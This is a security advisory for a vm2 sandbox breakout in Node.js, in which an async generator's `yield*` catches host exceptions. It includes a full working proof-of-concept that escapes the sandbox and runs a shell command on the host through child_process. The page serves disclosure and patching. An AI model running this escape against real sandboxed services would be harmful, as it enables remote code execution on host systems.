GHSA-248r-7h7q-cr24
vm2 Has a Sandbox Breakout Using Async Generator
Details
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
It is possible to catch a host exception using the `yield*` expression inside an async generator. When the generator is closed using the `return` function, the value is awaited on and exceptions thrown in the `then` call will be catched by the runtime and passed to the `yield*` iterator as the next value.
### PoC
```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` class E extends Error {} function so(d) { if (d > 0) so(d-1); const e = new E(); e.stack; throw e; } async function* helper() { yield* { [Symbol.asyncIterator]: ()=>({ next: v=>({value: v, done: false}) }) }; } async function doCatch(f) { const i=helper(); await i.next(); const v = await i.return({then(r){f();r();}}); return v.value; } (async function f() { let min = 0; let max = 10000000; while (min<max) { const mid = (min+max)>>1; const e = await doCatch(()=>so(mid)); if (e.name==="RangeError" && !(e instanceof RangeError)) { e.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); return; } if (e instanceof E) { min = mid+1; } else { max = mid; } } })(); `)); ```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/patriksimek/vm2/security/advisories/GHSA-248r-7h7q-cr24 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-45411 [ADVISORY]
- https://github.com/patriksimek/vm2/commit/093494c0c3ef2390d2e56909f9d56e290e6f18b0 [WEB]
- https://github.com/patriksimek/vm2 [PACKAGE]
- https://github.com/patriksimek/vm2/releases/tag/v3.11.3 [WEB]